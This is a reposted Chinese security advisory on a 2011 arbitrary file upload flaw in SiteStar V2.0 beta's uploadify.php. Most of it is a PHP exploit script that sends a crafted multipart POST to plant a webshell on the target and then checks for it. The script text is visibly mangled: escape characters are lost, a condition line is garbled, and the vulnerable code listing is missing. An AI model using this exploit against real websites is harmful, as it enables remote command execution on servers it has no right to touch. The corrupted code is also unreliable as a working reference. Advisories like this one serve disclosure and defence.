建站之星 SiteStar V2.0 任意文件上传漏洞

admin 2021年4月3日18:52:16评论57 views字数 1480阅读4分56秒阅读模式

发布日期:2011-03.16

发布作者:cnryan

影响版本:SiteStar V2.0 beta

官方网站:http://www.sitestar.cn/

漏洞类型:文件上传

[1]漏洞概述:

SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。

[2]漏洞分析:

漏洞产生在 /script/multiupload/uploadify.php 文件:


没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。

print_r('
+---------------------------------------------------------------------------+
SiteStar V2.0 Remote Shell Upload Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan
+---------------------------------------------------------------------------+
');
if ($argc W.S.Trn-----cnryanrn";
    $payload .= "Content-Disposition: form-data; name="upload"rnrnrn";
    $payload .= "-----cnryanrn";
    $payload .= "Content-Disposition: form-data; name="folder"rnrn";
    $payload .= "$pathrn";
    $payload .= "-----cnryan--";
    $packet  = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0rn";
    $packet .= "Host: {$host}rn";
    $packet .= "Connection: keep-alivern";
    $packet .= "Content-Type: multipart/form-data; boundary=---cnryanrn";
    $packet .= "Content-Length: ".strlen($payload)."rnrn";
    $packet .= $payload;
$fp = fsockopen($host, 80);
    fputs($fp, $packet);

   sleep(5);
   $str=file_get_contents($shell);
if(strpos($str,'W.S.T'))
    exit("OK! Got shell:t$shelln");
else
    exit("Exploit Failed!n");
?> 

[4]漏洞状态:

漏洞已通知厂商。

[5]厂商回复:

感谢您的反馈,谢谢!


老洞,纯属收集,转自:http://hi.baidu.com/cnryan/blog/item/0d0a4377d9f6790fb151b9e6.html

文章来源于lcx.cc:建站之星 SiteStar V2.0 任意文件上传漏洞

相关推荐: 【巨狗血!】奇葩的比特币钓鱼案例!!!!!!

奇葩的比特币钓鱼案例 rayh4c | 2013-12-04 16:19 昨天有个比特币被盗的事太有意思了~~~~ 有骗子在某交易市场论坛用"漏洞"改了个和官方版主一样的昵称,然后发了个贴交大家怎么快速转账到该交易市场,可以少收手续费。 于是血案发生了,大家开…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:52:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   建站之星 SiteStar V2.0 任意文件上传漏洞http://cn-sec.com/archives/318969.html

发表评论

匿名网友 填写信息